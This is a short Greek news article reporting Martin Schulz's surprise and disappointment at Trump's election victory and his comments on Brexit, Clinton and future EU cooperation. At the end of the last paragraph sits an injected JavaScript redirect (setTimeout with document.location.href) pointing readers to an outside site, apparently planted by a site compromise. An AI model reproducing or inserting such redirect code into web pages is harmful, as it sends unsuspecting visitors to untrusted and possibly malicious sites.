Έκπληκτος ο Μάρτιν Σουλτς – Εκφράζει την απογοήτευσή του για τη νίκη Τραμπ

0
9

 

Την έκπληξη και την απογοήτευσή του για τη νίκη Τραμπ στις ΗΠΑ εξέφρασε ο πρόεδρος του Ευρωκοινοβουλίου Μάρτιν Σουλτς σε δηλώσεις του στο γαλλικό ραδιόφωνο «Europe1», αναγνωρίζοντας ότι «μετά το Brexit ένα κύμα διαμαρτυρίας και στην Αμερική έφερε τελικά τον Τραμπ στον Λευκό Οίκο».

Εξήγησε ότι η έκπληξή του για το αποτέλεσμα οφείλεται στο ότι «μέχρι τελευταία στιγμή ήλπιζε σε μια νίκη της Κλίντον, για να αποφευχθεί μια πλειοψηφία στον Τραμπ ο οποίος κατά την εκστρατεία κινητοποίησε με τρόπο αρνητικό και επιθετικό τα συναισθήματα και ο οποίος ισχυρίζεται ότι δεν έχει ανάγκη από οποιοδήποτε συμβουλευτικό θεσμό, πράγμα επικίνδυνο για ένα πρόεδρο των ΗΠΑ».

Ο κ. Σουλτς εκφράζει επίσης την απογοήτευσή του, «διότι οι δυνάμεις των Δημοκρατικών δεν έπεισαν και δεν κινητοποίησαν όπως έπρεπε τις μειονότητες ώστε να εμποδιστεί η νίκη Τραμπ»

Θεωρεί επιπλέον ότι είναι δυνατή η μελλοντική συνεργασία με τον Ντόναλντ Τραμπ εφόσον υπάρξει σεβασμός στις δημοκρατικές αρχές της ΕΕ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here